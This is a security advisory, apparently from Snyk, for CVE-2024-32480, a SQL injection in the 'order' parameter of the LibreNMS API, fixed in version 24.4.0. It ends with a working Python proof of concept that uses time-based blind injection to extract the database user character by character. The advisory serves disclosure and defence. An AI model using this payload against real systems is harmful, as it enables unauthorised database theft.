SQL Injection Affecting librenms/librenms package, versions <24.4.0
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-LIBRENMSLIBRENMS-6672154
- published 23 Apr 2024
- disclosed 22 Apr 2024
- credit 4uuu Nya
Introduced: 22 Apr 2024
New CVE-2024-32480 Open this link in a new tabHow to fix?
Upgrade librenms/librenms
to version 24.4.0 or higher.
Overview
librenms/librenms is a fully featured network monitoring system that provides a wealth of features and device support.
Affected versions of this package are vulnerable to SQL Injection due to improper validation of user-supplied input in the order
parameter. An attacker can extract the entire database by manipulating the input to the order
parameter, leading to a successful SQL injection attack. This vulnerability is triggered when the order
parameter's value, obtained from the user's request, is directly incorporated into an SQL statement without proper sanitization and concatenated, allowing for manipulation of the SQL query.
PoC
import string
import requests
headers = {
'X-Auth-Token': 'token_string'
}
req = requests.Session()
payloads = '_-@.,' + string.digits + string.ascii_letters
url = 'http://host/api/v0/devices?order=device_id` and if(ascii(substr(user(),%d,1))=%d,sleep(5),1) and d.`device_id'
result = 'user: '
for i in range(10):
for payload in payloads:
try:
req.get(url % (i+1, ord(payload)), headers=headers, timeout=3)
except requests.exceptions.ReadTimeout as ex:
result += payload
print(result),
except Exception as e:
pass